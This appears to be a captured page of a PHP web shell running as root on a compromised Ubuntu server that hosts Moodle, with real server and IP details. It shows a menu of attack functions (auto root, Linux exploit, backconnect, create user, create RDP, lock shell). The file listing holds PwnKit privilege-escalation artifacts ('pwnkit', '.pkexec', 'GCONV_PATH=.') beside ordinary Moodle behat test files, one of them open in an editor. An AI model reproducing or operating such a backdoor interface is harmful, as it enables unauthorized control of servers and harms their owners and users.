Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
files /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_custom_file_type.feature
1.6
KB
-rwxrwxrwx
course_files.feature
1.42
KB
-rwxrwxrwx
license_help_modal.feature
2.44
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : course_files.feature
@core @core_files Feature: Course files In order to add legacy files As a user I need to upload files @javascript Scenario: Add legacy files Given the following "courses" exist: | fullname | shortname | category | legacyfiles | | Course 1 | C1 | 0 | 2 | And the following config values are set as admin: | legacyfilesinnewcourses | 1 | | legacyfilesaddallowed | 1 | When I log in as "admin" And I am on "Course 1" course homepage Then "Legacy course files" "link" should exist in current page administration And I navigate to "Legacy course files" in current page administration And I press "Edit legacy course files" And "Add..." "link" should be visible And "Create folder" "link" should be visible @javascript Scenario: Add legacy file disabled Given the following "courses" exist: | fullname | shortname | category | legacyfiles | | Course 1 | C1 | 0 | 2 | And the following config values are set as admin: | legacyfilesinnewcourses | 1 | | legacyfilesaddallowed | 0 | When I log in as "admin" And I am on "Course 1" course homepage Then "Legacy course files" "link" should exist in current page administration And I navigate to "Legacy course files" in current page administration And I press "Edit legacy course files" And "Add..." "link" should not be visible And "Create folder" "link" should not be visible
Close